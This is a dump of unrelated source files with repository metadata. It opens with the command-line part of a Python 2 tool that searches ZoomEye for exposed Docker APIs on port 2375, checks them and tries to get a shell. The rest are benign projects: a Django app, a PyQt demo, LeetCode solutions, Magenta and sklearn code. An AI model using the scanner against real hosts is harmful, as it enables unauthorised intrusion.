parse.add_argument('-k',dest = 'keyword',help = 'Search keyword default:port:2375 X-Content-Type-Options: nosniff country:"CN"')
parse.add_argument('-p',dest = 'PageNum',help = 'Search PageNum')
parse.add_argument('-d',dest = 'dictpath',help = 'Detection of URL in the file')
parse.add_argument('-s',dest = 'CtrlDict',help = 'Has confirmed the existence of loopholes, try to get shell')
args = parse.parse_args()
Action_check = args.check
Action_getshell = args.getshell
Action_Panel_Test = args.zoomeye
Search_keyword = args.keyword
PageNum = args.PageNum
filepath = args.dictpath
CtrlDictpath = args.CtrlDict
if(Action_Panel_Test != True and filepath == None and CtrlDictpath == None):
TmpUrl = urlparse.urlparse(args.url)
host= TmpUrl.netloc.split(':')
TestUrl = urlparse.urlunparse((TmpUrl.scheme,TmpUrl.netloc,'/','','',''))
new_scan = scan()
if Action_check == True:
print 'Start Test...'
new_scan.Check(TestUrl)
if(Action_getshell == True):
new_scan.Getshell(TestUrl , host[0] , host[1])
if(Action_Panel_Test == True):
new_scan.Panel_Scan(Search_keyword,PageNum)
if(filepath != None):
new_scan.filescan(filepath)
if(CtrlDictpath != None):
new_scan.filegetshell(CtrlDictpath)
|
[
"1123302584@qq.com"
] |
1123302584@qq.com
|
498da4533e4674142210175eb4143f97f45fb56d
|
bb1c9216868de6244a72d3fc1d4f6be0d7dc4ea4
|
/UpdateFactorDatabase/FundamentalFactors/FactorAlgos/Profitability/CashFlowMargin_TTM.py
|
9b2fba6225722035391ab0ed83320c7c222568e1
|
[] |
no_license
|
wusf/MyQunatLib
|
9e430c4be101f470a66c5faa38b9a082a9b4f7a5
|
5156d9b18dd37c5cda6bf8169497a8432fe083a1
|
refs/heads/master
| 2021-01-21T04:55:39.147432
| 2016-07-22T05:26:17
| 2016-07-22T05:26:17
| 48,779,521
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 929
|
py
|
#!/usr/bin/env python
#coding:utf-8
"""
Author: Wusf --<wushifan221@gmail.com>
Purpose:
Created: 2016/1/12
"""
#----------------------------------------------------------------------
def Calc(cur,acctPeriods,p,s,date,stkCode):
"""
计算过去12个月CashFlowMargin
cur:内存数据库cursor
date:查询当日的日期和数据有效的最早日期
stkCode:股票代码
"""
begDate = date[0]
endDate = date[1]
sql = """
SELECT CFO_TTM/Sales_TTM
FROM FinancialPITData
WHERE StkCode='{}'
AND DeclareDate>='{}'
AND DeclareDate<='{}'
ORDER BY DeclareDate DESC LIMIT 1
"""
cur.execute(sql.format(stkCode,begDate,endDate))
content = cur.fetchone()
if content==None:
return None
if content[0]==None:
return None
v = content[0]
#print v,s,p
return v
|
[
"wushifan221@gmail.com"
] |
wushifan221@gmail.com
|
ea8abfa4667e8e810e2e912a2070a29eace34964
|
29372d402db9293e28c51b620b9f98dacbaf6260
|
/Processing/Section 3/Listing3/Listing3.pyde
|
fd8ec1b6e79927339f18259734371fdfdc5ccbe3
|
[
"MIT"
] |
permissive
|
Grigory526/2019-fall-polytech-cs
|
9cfb053084657da3e337f413c66f9ac36466b0ca
|
1e87472fa128f6d69a3b99118e04ce4cce9ac70a
|
refs/heads/master
| 2020-07-27T03:37:54.677364
| 2019-12-21T17:11:10
| 2019-12-21T17:11:10
| 208,854,212
| 1
| 0
|
MIT
| 2019-09-16T17:07:01
| 2019-09-16T17:07:01
| null |
UTF-8
|
Python
| false
| false
| 271
|
pyde
|
def setup():
size(500, 500)
smooth()
background(255)
noLoop()
fill(50, 80)
stroke(100)
strokeWeight(3)
def draw():
ellipse(250,200,100,100)
ellipse(250-50,250,100,100);
ellipse(250+50,250,100,100)
ellipse(250,250+50,100,100)
|
[
"bakaenko.gi@edu.spbstu.ru"
] |
bakaenko.gi@edu.spbstu.ru
|
529802340e8ded3a16e40bd4da845392f90caa2f
|
eb9e5f950f567458deb7ac6a958e9e07eec8211c
|
/Python/Projects/dbtest/people/migrations/0002_auto_20161204_1710.py
|
0dafaaee79bea0c99b52161d0c3317aec9b33cc8
|
[] |
no_license
|
hyteer/ytest
|
b32402f4a85af2cba298729b81ae73ccedbe6013
|
98234f88e923a705ce08673a269904ca81117f03
|
refs/heads/master
| 2020-01-23T21:47:40.100472
| 2017-01-23T10:12:21
| 2017-01-23T10:12:21
| 74,676,200
| 0
| 0
| null | 2017-01-23T10:12:22
| 2016-11-24T13:34:34
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 824
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-04 09:10
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('people', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='person',
name='age',
field=models.CharField(default=None, max_length=10),
),
migrations.AddField(
model_name='person',
name='created_time',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AddField(
model_name='person',
name='email',
field=models.EmailField(default=None, max_length=254),
),
]
|
[
"hyteer@qq.com"
] |
hyteer@qq.com
|
0804c050636b0238be93856f4924ef5b5e6e7afb
|
0f51a8ef5caf757cbbfe0a3624b6ba10251193f8
|
/warehouse/packaging/interfaces.py
|
cfd2a042685b61630bc25a3759f05e279febda1b
|
[
"Apache-2.0"
] |
permissive
|
cuiqiang/warehouse
|
a2bd83b9a5de9ede0c3c1052f5d9087e4dd9af10
|
c7a5174b90f6a4e70c9e7c4723d1fce5cb22d9b1
|
refs/heads/master
| 2020-12-26T03:45:02.616887
| 2015-05-10T13:59:15
| 2015-05-10T13:59:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 994
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from zope.interface import Interface
class IDownloadStatService(Interface):
def get_daily_stats(project):
"""
Return the daily download counts for the given project.
"""
def get_weekly_stats(project):
"""
Return the weekly download counts for the given project.
"""
def get_monthly_stats(project):
"""
Return the monthly download counts for the given project.
"""
|
[
"donald@stufft.io"
] |
donald@stufft.io
|
5a0fd84ce2aa02ed1b842c00529489bfbbf556c4
|
04b5ff9b8e8c64b3150667c6c59172432d28999c
|
/wireshark/wireshark_dns_capture.py
|
4c3de291a8b470df3ec5e052d2dd31d74ccaeac0
|
[
"MIT"
] |
permissive
|
jeffrade/python-collections
|
d910be280760c18b021b6ad1b099110c74f23b93
|
f40bbd4f3f1ceb1d688e9938b0c0aaa98b7f72f4
|
refs/heads/master
| 2021-07-15T12:09:21.600610
| 2021-03-10T15:16:18
| 2021-03-10T15:16:18
| 101,828,426
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,549
|
py
|
import sys
import re
def main(filename, args):
print('starting...')
capture = WiresharkDnsCapture(args[0])
capture.find()
print('DONE!')
class WiresharkDnsCapture():
__dns_file_location = None
__out_file = None
__dns_domain = []
def __init__(self, dns_file_location):
self.__dns_file_location = dns_file_location
out_file = "%s%s" % (dns_file_location, '.clean')
self.__out_file = open(out_file, 'w')
def find(self):
print('entering find...')
self.__createDnsList()
self.__readDnsAndWriteToOut()
def __createDnsList(self):
print('entering __createDnsList...')
with open(self.__dns_file_location) as file:
for index, line in enumerate(file):
domain_array = line.split("CNAME ")
ip_array = re.findall( r'[0-9]{1,3}(?:\.[0-9]{1,3}){3}', line)
if(len(domain_array) > 1 and len(ip_array) > 0):
domain = self.__cleanText(domain_array[1].split(" ")[0])
if(domain not in self.__dns_domain):
self.__dns_domain.append(domain)
def __readDnsAndWriteToOut(self):
print('entering __readDnsAndWriteToOut...')
for domain in self.__dns_domain:
self.__writeToOutFile(domain)
def __writeToOutFile(self, line):
self.__out_file.write("%s%s" % (line, "\n"))
def __cleanText(self, text):
return text.replace("\n", "")
if __name__ == '__main__':
main(__file__, sys.argv[1:])
|
[
"jeffrade@users.noreply.github.com"
] |
jeffrade@users.noreply.github.com
|
cd563ed6215b53d734e3d8c511ab618f732371e7
|
4e2dbf2b255a40f06c0490c6ce62d53f61a865ee
|
/Praktikum/Modul 5/QDateEdit.py
|
6ab8fc5e892ab2de1a68a3488a9875ba396984c1
|
[] |
no_license
|
NabilahSharfina/PEMROGRAMANGUI
|
7a3947e94fd2dc0dd2e5e9ad79e8899814e3e088
|
8b67cbd13c176b24c5238ebd9087c68b42762af2
|
refs/heads/main
| 2023-08-21T23:58:16.885539
| 2021-10-15T00:05:27
| 2021-10-15T00:05:27
| 358,811,701
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,945
|
py
|
import sys
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
class MainForm(QWidget):
def __init__(self):
super().__init__()
self.setupUi()
def setupUi(self):
self.resize(400, 100)
self.move(300, 300)
self.setWindowTitle('Demo QDateTimeEdit')
self.dateLabel = QLabel('Tanggal')
self.dateEdit = QDateEdit()
self.dateEdit.setDisplayFormat('dddd dd/MM/yyyy')
self.dateEdit.setDate(QDate.currentDate())
self.timeLabel = QLabel('Waktu')
self.timeEdit = QTimeEdit()
self.timeEdit.setDisplayFormat('hh:mm')
self.timeEdit.setTime(QTime.currentTime())
self.dateTimeLabel = QLabel('Tanggal dan Waktu')
self.dateTimeEdit = QDateTimeEdit()
self.dateTimeEdit.setDisplayFormat('dddd dd/MM/yyyy hh:mm')
self.dateTimeEdit.setDateTime(QDateTime.currentDateTime())
self.okButton = QPushButton('&OK')
hbox = QHBoxLayout()
hbox.addStretch()
hbox.addWidget(self.okButton)
layout = QGridLayout()
layout.addWidget(self.dateLabel, 0, 0)
layout.addWidget(self.dateEdit, 0, 1)
layout.addWidget(self.timeLabel, 1, 0)
layout.addWidget(self.timeEdit, 1, 1)
layout.addWidget(self.dateTimeLabel, 2, 0)
layout.addWidget(self.dateTimeEdit, 2, 1)
layout.addLayout(hbox, 3, 0, 1, 2)
self.setLayout(layout)
self.okButton.clicked.connect(self.okButtonClick)
def okButtonClick(self):
QMessageBox.information(self, 'Informasi', 'Date: ' + self.dateEdit.date().toString() + '\n' + 'Time: ' +
self.timeEdit.time().toString() + '\n' + 'Datetime: ' + self.dateTimeEdit.dateTime().toString() + '\n')
if __name__ == '__main__':
a = QApplication(sys.argv)
form = MainForm()
form.show()
a.exec_()
|
[
"noreply@github.com"
] |
NabilahSharfina.noreply@github.com
|
b402fedd165b97de4032cb90d940543aff9f9d3b
|
5c5b34f6f598a43ddfbd473228737a27c26d1d8e
|
/22_括号生成.py
|
214e398a4ac5e763162057d30f752d405069e313
|
[] |
no_license
|
lovehhf/LeetCode
|
34a1bc140b10dc83a32ef9a70f9c73176948a9c4
|
5d3574ccd282d0146c83c286ae28d8baaabd4910
|
refs/heads/master
| 2021-11-04T04:52:34.518621
| 2021-10-26T15:34:47
| 2021-10-26T15:34:47
| 173,673,492
| 0
| 0
| null | 2020-03-03T14:54:09
| 2019-03-04T04:26:15
|
Python
|
UTF-8
|
Python
| false
| false
| 2,370
|
py
|
# -*- coding:utf-8 -*-
__author__ = 'huanghf'
"""
给出 n 代表生成括号的对数,请你写出一个函数,使其能够生成所有可能的并且有效的括号组合。
例如,给出 n = 3,生成结果为:
[
"((()))",
"(()())",
"(())()",
"()(())",
"()()()"
]
n = 2:
["()()","(())"]
"""
class Solution:
def generateParenthesis(self, n):
"""
dfs添加所有有效括号
剪枝:
1. 每次可以放置左括号的条件是当前左括号的数目不超过n
2. 每次可以放置右括号的条件是当前右括号的数目不超过左括号的数目
:type n: int
:rtype: List[str]
"""
def dfs(left, right, n, path, res):
if left == n and right == n:
res.append(path)
return
if left < n:
dfs(left + 1, right, n, path + '(', res)
if right < left:
dfs(left, right + 1, n, path + ')', res)
res = []
dfs(0, 0, n, '', res)
return res
def generateParenthesis3(self, n):
"""
闭合数
看不懂。
:param n:
:return:
"""
if n == 0: return ['']
ans = []
for c in range(n):
for left in self.generateParenthesis(c):
for right in self.generateParenthesis(n - 1 - c):
ans.append('({}){}'.format(left, right))
return ans
def generateParenthesis2(self, n: int):
"""
暴力生成
:param n:
:return:
"""
ans = []
def valid(A):
bal = 0
for c in A:
if c == "(":
bal += 1
else:
bal -= 1
if bal < 0:
return False
return bal == 0
def generate(A):
if len(A) == 2 * n:
if valid(A):
ans.append("".join(A))
else:
print(A)
# 使用递归生成所有序列
A.append("(")
generate(A)
A.pop()
A.append(')')
generate(A)
A.pop()
generate([])
return ans
n = 3
s = Solution()
print(s.generateParenthesis(n))
|
[
"853885165@qq.com"
] |
853885165@qq.com
|
2d34a43c3b4450c07e06545c33f29a7ef89ab745
|
bf59746b818fae750ed8f21c66d1fb184da1aecc
|
/p3-avaliacao/resultado.py
|
851c3724274cda08423f1d99ee37c92486c4754c
|
[] |
no_license
|
bpoliana/praticas-minicurso-ml
|
cf29eb08f0795d38e62094543a0e1eea8cddf23b
|
b9fa6de24101ae0d123efbb614013bcbd8f2b3dc
|
refs/heads/master
| 2022-12-10T16:13:08.871630
| 2020-09-02T12:11:46
| 2020-09-02T12:11:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,108
|
py
|
from sklearn.exceptions import UndefinedMetricWarning
import optuna
import numpy as np
import pandas as pd
import warnings
from typing import List
class Resultado():
def __init__(self, y:List[float], predict_y:List[float]):
"""
y: Vetor numpy (np.array) em que, para cada instancia i, y[i] é a classe alvo da mesma
predict_y: Vetor numpy (np.array) que representa a predição y[i] para a instancia i
Tanto y quando predict_y devem assumir valores numéricos
"""
self.y = y
self.predict_y = predict_y
self._mat_confusao = None
self._precisao = None
self._revocacao = None
@property
def mat_confusao(self) -> np.ndarray:
"""
Retorna a matriz de confusão.
O retorno np.ndarray é um array numpy, neste caso, a matriz de confusão
"""
#caso a matriz de confusao já esteja calculada, retorna-la
if self._mat_confusao is not None:
return self._mat_confusao
#instancia a matriz de confusao como uma matriz de zeros
#A matriz de confusão será o máximo entre os valores de self.y e self.predict_y
max_class_val = max([self.y.max(),self.predict_y.max()])
self._mat_confusao = np.zeros((max_class_val+1,max_class_val+1))
#incrementa os valores da matriz baseada nas listas self.y e self.predict_y
for i,classe_real in enumerate(self.y):
self._mat_confusao[classe_real][self.predict_y[i]] += 1
#print("Predict y: "+str(self.predict_y))
#print("y: "+str(self.y))
#print("Matriz de confusao final :"+str(self._mat_confusao))
return self._mat_confusao
@property
def precisao(self) -> float:
"""
Precisão por classe
"""
if self._precisao is not None:
return self._precisao
#inicialize com um vetor de zero usando np.zeros
self._precisao = np.zeros(len(self.mat_confusao))
#para cada classe, armazene em self._precisao[classe] o valor relativo à precisão
#dessa classe
for classe in range(len(self.mat_confusao)):
#obtnha todos os elementos que foram previstos com essa classe
num_previstos_classe = 0
for classe_real in range(len(self.mat_confusao)):
num_previstos_classe += self.mat_confusao[classe_real][classe]
#precisao: numero de elementos previstos corretamente/total de previstos com essa classe
#calcule a precisão para a classe
if num_previstos_classe!=0:
self._precisao[classe] = self.mat_confusao[classe][classe]/num_previstos_classe
else:
self._precisao[classe] = 0
warnings.warn("Não há elementos previstos para a classe "+str(classe)+" precisão foi definida como zero.", UndefinedMetricWarning)
return self._precisao
@property
def revocacao(self) -> float:
if self._revocacao is not None:
return self._revocacao
self._revocacao = np.zeros(len(self.mat_confusao))
for classe in range(len(self.mat_confusao)):
#por meio da matriz, obtem todos os elementos que são dessa classe
num_classe = 0
num_elementos_classe = 0
for classe_prevista in range(len(self.mat_confusao)):
num_elementos_classe += self.mat_confusao[classe][classe_prevista]
#revocacao: numero de elementos previstos corretamente/total de elementos dessa classe
if num_elementos_classe!=0:
self._revocacao[classe] = self.mat_confusao[classe][classe]/num_elementos_classe
else:
self._revocacao[classe] = 0
warnings.warn("Não há elementos da classe "+str(classe)+" revocação foi definida como zero.", UndefinedMetricWarning)
return self._revocacao
@property
def f1_por_classe(self) -> float:
"""
retorna um vetor em que, para cada classe, retorna o seu f1
"""
f1 = np.zeros(len(self.mat_confusao))
for classe in range(len(self.mat_confusao)):
if(self.precisao[classe]+self.revocacao[classe] == 0):
f1[classe] = 0
else:
f1[classe] = 2*(self.precisao[classe]*self.revocacao[classe])/(self.precisao[classe]+self.revocacao[classe])
return f1
@property
def macro_f1(self):
#Atividade 1: substitua o none...lembre-se que já foi calculado o
#f1 por classe no atributo calculado correspondente.
#Lembre-se de como usar atributos calculados.
return None
@property
def acuracia(self):
#quantidade de elementos previstos corretamente
num_previstos_corretamente = 0
for classe in range(len(self.mat_confusao)):
#Atividade 1: complete o código abaixo, substituindo o None
num_previstos_corretamente += None
return num_previstos_corretamente/len(self.y)
class Fold():
def __init__(self,df_treino :pd.DataFrame, df_data_to_predict:pd.DataFrame,
col_classe:str,num_folds_validacao:int=0,num_repeticoes_validacao:int=0):
self.df_treino = df_treino
self.df_data_to_predict = df_data_to_predict
self.col_classe = col_classe
#Atividade 3(b): Inicialize o arr_folds_validacao apropriadamente
if num_folds_validacao>0:
self.arr_folds_validacao = self.gerar_k_folds(df_treino,num_folds_validacao,col_classe,num_repeticoes_validacao)
else:
self.arr_folds_validacao = []
@staticmethod
def gerar_k_folds(df_dados,val_k:int,col_classe:str,num_repeticoes:int=1,seed:int=1,
num_folds_validacao:int=0,num_repeticoes_validacao:int=1) -> List["Fold"]:
"""
Implementar esta função de acordo com os comentários no código
Retorna um vetor arr_folds com todos os k folds criados a partir do DataFrame df
df: DataFrame com os dados a serem usados
val_k: parametro k da validação cruzada de k-folds
col_classe: coluna que representa a classe
seed: seed para a amostra aleatória
"""
#1. especifique o número de instancias por fold usando
#...o parametro val_k
num_instances_per_partition = None
#folds de saida
arr_folds = []
for num_repeticao in range(num_repeticoes):
#2. Embaralhe os dados: para isso, use o método sample para fazer uma amostra aleatória usando 100% dos dados. Use a seed passada como parametro
#lembre-se que, para cada repetição, deve-se haver uma seed diferente
#para isso, use seed+num_repeticao
df_dados_rand = None
#Impressão dos ids dos dados (exiba o print para testes)
#print("Dados: "+str(df.index.values))
#para cada fold num_fold:
for num_fold in range(val_k):
#2. especifique o inicio e fim do fold de teste. Caso seja o ultimo, o fim será o tamanho do vetor.
#Use num_instances_per_partition e num_fold para deliminar o inicio e fim do teste
ini_fold_to_predict = None
if num_fold < val_k-1:
fim_fold_to_predict = None
else:
fim_fold_to_predict = None
#print(f"Inicio: {ini_fold_to_predict} - Fim: {fim_fold_to_predict}")
#3. por meio do df_dados_rand, obtenha os dados de avaliação (teste ou validação)
df_to_predict = None
#print(df_to_predict)
#4. Crie o treino por meio dos dados originais (df_dados_rand),
#removendo os dados que serão avaliados (df_to_predict)
df_treino = None
#print(df_treino)
#5. Crie o fold (objeto da classe Fold) para adicioná-lo no vetor
fold = None
arr_folds.append(fold)
#imprime o número instancias por fold (descomente para testes)
"""
for num_repeticao in range(num_repeticoes):
for num_fold in range(val_k):
i = val_k*num_repeticao+num_fold
df_treino = arr_folds[i].df_treino
df_to_predict = arr_folds[i].df_data_to_predict
qtd_treino = len(df_treino.index)
qtd_to_predict = len(df_to_predict.index)
print(f"Repeticao #{num_repeticao} Fold #{num_fold} instancias no treino: {qtd_treino} teste: {qtd_to_predict}")
print(f"\tÍndices das instancias do treino: {df_treino.index.values}")
print(f"\tÍndices das instancias a avaliar (teste ou validação): {df_to_predict.index.values}")
print(" ")
"""
return arr_folds
def __str__(self):
return f"Treino: \n{self.df_treino}\n Dados a serem avaliados (teste ou validação): {self.df_data_to_predict}"
def __repr__(self):
return str(self)
|
[
"prof.daniel.hasan@gmail.com"
] |
prof.daniel.hasan@gmail.com
|
fb1f8e94a653194037e6c712b7c8613a7f8f23c8
|
9a4fb95d07b41c3a9b30971f97f88f279192cd2d
|
/DevelopmentFiles/mag_start.py
|
687c793ffb3c44e479726c5da3ea97249df63604
|
[] |
no_license
|
matheucampbell/RealtimeMelodies
|
5cf527651ef4ee122aad0870f0a363be554d1ceb
|
7bdb07a75867d6f0c8c994033b06455768abc0ed
|
refs/heads/main
| 2023-07-01T21:15:39.778398
| 2021-08-13T23:22:46
| 2021-08-13T23:22:46
| 344,292,039
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,806
|
py
|
import magenta # Google's ML for Art and Music Module
import note_seq # Serialized input for notes based on frequency and duration
import tensorflow # Generalized machine learning package
print("Starting...")
# Creating Sequence (Melody A: C# Minor 4/4)
mel = note_seq.protobuf.music_pb2.NoteSequence() # Initialize NoteSequence object
note_list = ((61, 0, 1), (61, 1, 1.5), (64, 1.5, 2), (66, 2, 2.5), (69, 2.5, 3),
(68, 3, 4), (64, 4, 4.5), (66, 4.5, 5), (64, 5, 5.5), (63, 5.5, 6),
(61, 6, 7), (60, 7, 8)) # List of notes in the form (freq, start, end)
for note in note_list: # Add all the notes
mel.notes.add(pitch=note[0], start_time=note[1], end_time=note[2],
velocity=80)
mel.tempos.add(qpm=90)
# Convert note_seq to MIDI for storage and playback
note_seq.sequence_proto_to_midi_file(mel, 'Input/in.mid')
# Import Dependencies
from magenta.models.melody_rnn import melody_rnn_sequence_generator
from magenta.models.shared import sequence_generator_bundle
from note_seq.protobuf import generator_pb2
from note_seq.protobuf import music_pb2
# Initialize Model
bundle = sequence_generator_bundle.read_bundle_file('Src/basic_rnn.mag') # Loads model for use
generator_map = melody_rnn_sequence_generator.get_generator_map()
melody_rnn = generator_map['basic_rnn'](checkpoint=None, bundle=bundle)
melody_rnn.initialize()
# Model Parameters
steps = 16
tmp = 1.0 # Measure of the generation's "temperature". Higher = More scattered/random
# Initialize Generator
gen_options = generator_pb2.GeneratorOptions()
gen_options.args['temperature'].float_value = tmp
gen_section = gen_options.generate_sections.add(start_time=8, end_time=16)
out = melody_rnn.generate(mel, gen_options)
note_seq.sequence_proto_to_midi_file(out, 'Output/out.mid')
|
[
"noreply@github.com"
] |
matheucampbell.noreply@github.com
|
5cfc48c150ed0cce679cfff781322b5e69a63722
|
d0792d43fad5a607d232d76d2337e0043bb6ba72
|
/test_ingress.py
|
3804e571227e49ad29f984fe4bd897119e9ac6b1
|
[
"MIT"
] |
permissive
|
tebeka/ingress
|
0add5003ade060e8bf5d579f77bb233de75a4dd7
|
aa19ed9a95b7a784629ad71f0dddc84017d897ba
|
refs/heads/main
| 2023-08-07T15:38:53.545488
| 2023-06-14T12:05:00
| 2023-06-14T12:05:00
| 157,278,670
| 6
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,794
|
py
|
from socket import error as SocketError
from socket import socket
from time import sleep, time
import re
import ingress
def free_port():
sock = socket()
sock.listen(0)
port = sock.getsockname()[1]
sock.close()
return port
def wait_for_server(port, timeout=10):
start = time()
while time() - start <= timeout:
sock = socket()
try:
sock.connect(('localhost', port))
return sock
except SocketError:
sleep(0.1)
return None
def start_server(passwd=None):
port = free_port()
env = {}
ingress.install(('localhost', port), env, passwd)
assert wait_for_server(port), 'server did not start'
return Client(port)
class Client:
def __init__(self, port):
sock = wait_for_server(port)
self.rfile, self.wfile = sock.makefile('r'), sock.makefile('w')
def write(self, msg):
self.wfile.write(f'{msg}\n')
self.wfile.flush()
def read(self, prefix_len=0):
out = self.rfile.readline().strip()
prefix_len += len(ingress.PyHandler.prompt)
return out[prefix_len:]
def test_ingress():
c = start_server()
header = c.read()
assert 'ingress' in header, 'bad header'
c.write('1 + 1')
out = c.read()
assert out == '2', 'bad output'
def test_password():
passwd = 's3cr3t'
c = start_server(passwd)
c.read() # Skip header
c.write(f'{passwd}')
c.write('1 + 1')
out = c.read(len('Password: '))
assert out == '2', 'bad output'
def test_exec():
c = start_server()
c.read() # skip header
key, val = 'zaphod', 12
c.write(f'{key} = {val}')
c.write(key)
# FIXME: Why the prompt?
out = re.sub('^>* ', '', c.read())
assert out == str(val), 'bad value'
|
[
"miki.tebeka@gmail.com"
] |
miki.tebeka@gmail.com
|
ecf1cc3de1218708a5d736282e9bbcb9d5202ac1
|
d4ee3c7f4a3e5d9d9a9ed9c3cc83ca7e27f4c114
|
/LinearSVC/analyze_hyperparameters.py
|
c0a4479abdc8eeaf11dee46d3bd1553fb0dfaf5b
|
[] |
no_license
|
anuprulez/sklearn_hyperparameter_analysis
|
963217ca550c33f371d441ed37c28d6fb21fb917
|
d986c57a29184b7cbd446430f5f04d14e765d804
|
refs/heads/master
| 2020-03-26T12:11:25.784854
| 2018-09-20T16:58:25
| 2018-09-20T16:58:25
| 144,880,004
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,691
|
py
|
"""
Analyze hyperparameters of sklearn machine learning algorithms
"""
import sys
import numpy as np
import time
import os
from os import listdir
from os.path import isfile, join
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from mpl_toolkits.mplot3d import Axes3D
# file paths
CURRENT_WORKING_DIR = os.getcwd()
DATA_DIR = CURRENT_WORKING_DIR + "/results/penaltyterm/"
class AnalyseHyperparameters:
@classmethod
def __init__(self):
""" Init method. """
@classmethod
def read_file(self, path):
"""
Read a file
"""
return pd.read_csv(path, '\t')
@classmethod
def analyze_parameters(self):
"""
Analyse the hyperparameters and compute correlation
"""
files = [ file for file in os.listdir(DATA_DIR) if isfile(join(DATA_DIR, file))]
print files
NUM_COLORS = len(files)
cm = plt.get_cmap('gist_rainbow')
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_color_cycle([cm(1.*i/NUM_COLORS) for i in range(NUM_COLORS)])
for index, file in enumerate(files):
file_content = self.read_file(join(DATA_DIR, file))
ax.scatter(file_content['param_estimator__C'], file_content['mean_test_score'])
plt.legend(files)
plt.show()
if __name__ == "__main__":
if len(sys.argv) != 1:
print( "Usage: python analyze_hyperparameters.py" )
exit( 1 )
start_time = time.time()
parameters = AnalyseHyperparameters()
parameters.analyze_parameters()
end_time = time.time()
print ("Program finished in %s seconds" % str( end_time - start_time ))
|
[
"anup.rulez@gmail.com"
] |
anup.rulez@gmail.com
|
3356162bea19609ee75fb123fdd0be02180f93b3
|
d498630988c48046d71fb80d3851c571e96d59a5
|
/os.py
|
cff6c856d2e00891a8eff75c05b025d95753fd30
|
[] |
no_license
|
khatriharsh28/harshalkhond.github.io
|
7fbfb54917f8b78492f54e77e515f3d7cfeb9d98
|
d50dc472cb0b33a3a02c7eb5a84624daeee894f3
|
refs/heads/main
| 2023-08-24T02:51:59.018114
| 2021-10-24T14:12:50
| 2021-10-24T14:12:50
| 413,125,019
| 0
| 0
| null | 2021-10-03T16:07:18
| 2021-10-03T15:59:33
|
HTML
|
UTF-8
|
Python
| false
| false
| 488
|
py
|
from PIL import Image,ImageEnhance,ImageFilter
img1=Image.open("ph1.jfif")
max_size=(1500,500)
img1.thumbnail(max_size)
img1.save('ph1.jpg')
#import os
#for item in os.listdir():
#if item.endswith('.jpg'):
#img1=Image.open(item)
#filename,extension=os.path.splitext(item)
#img1.save(f'cab33.jpg')
#img1=Image.open('ccat.jpg')
#enhancer=ImageEnhance.Brightness(img1)
#img2=enhancer.enhance(2)
#img2=img1.filter(ImageFilter.GaussianBlur(radius=4))
#img2.save('xcat.jpg')
|
[
"86038877+harshalkhond@users.noreply.github.com"
] |
86038877+harshalkhond@users.noreply.github.com
|
6c8279bcc600b8aa085d7863a045ad03ab736f3a
|
083ca3df7dba08779976d02d848315f85c45bf75
|
/RepeatedSubstringPattern3.py
|
0f9bf90bef96e168810a12031264881ddf073304
|
[] |
no_license
|
jiangshen95/UbuntuLeetCode
|
6427ce4dc8d9f0f6e74475faced1bcaaa9fc9f94
|
fa02b469344cf7c82510249fba9aa59ae0cb4cc0
|
refs/heads/master
| 2021-05-07T02:04:47.215580
| 2020-06-11T02:33:35
| 2020-06-11T02:33:35
| 110,397,909
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 531
|
py
|
class Solution:
def repeatedSubstringPattern(self, s: str) -> bool:
i, j = 1, 0
n = len(s)
dp = [0] * (n + 1)
while i < n:
if s[i] == s[j]:
i += 1
j += 1
dp[i] = j
elif j == 0:
i += 1
else:
j = dp[j]
return dp[-1] != 0 and (dp[-1] % (n - dp[-1]) == 0)
if __name__ == '__main__':
s = input()
solution = Solution()
print(solution.repeatedSubstringPattern(s))
|
[
"jiangshen95@163.com"
] |
jiangshen95@163.com
|
201a8caa2ac0e35c9721887f358f1fafa9e92878
|
deb939988a000a87e3145f283b57a3b3f128d4bd
|
/activity/admin.py
|
2858af38ba7a1b73619b19ab4c75e44aecb6d489
|
[] |
no_license
|
Satendra124/cht-backend
|
abd18ed3bc4241acd6aadbb6ad60906199bf2241
|
d353f98c36e574c62ab91f75574dfa16bbabda55
|
refs/heads/main
| 2023-08-16T03:33:59.388814
| 2021-09-30T14:00:52
| 2021-09-30T14:00:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 329
|
py
|
from django.contrib import admin
from .models import Activity, SleepEvent, Survey, UsageData
# Register your models here.
class SleepAdmin(admin.ModelAdmin):
readonly_fields = ('time_end',)
admin.site.register(Activity)
admin.site.register(Survey)
admin.site.register(UsageData)
admin.site.register(SleepEvent,SleepAdmin)
|
[
"satendra.raj1241@gmail.com"
] |
satendra.raj1241@gmail.com
|
62c4578335124006470ede4c2761da6bf679eb64
|
93c9e3697c9e17b52561d54dfbb31cc8c5a765eb
|
/cool_django/wsgi.py
|
f641d39713a8b95b4a89578ee21a645e880d8447
|
[] |
no_license
|
minar09/cool-django
|
d065976dcf1d1e191bc3f4bfb2b66b47d41cf637
|
7ad1d04882f7d6e8b177ee99354d5c7ad3c97ed6
|
refs/heads/master
| 2021-01-12T10:58:39.483361
| 2016-11-05T06:02:38
| 2016-11-05T06:02:38
| 72,778,880
| 0
| 0
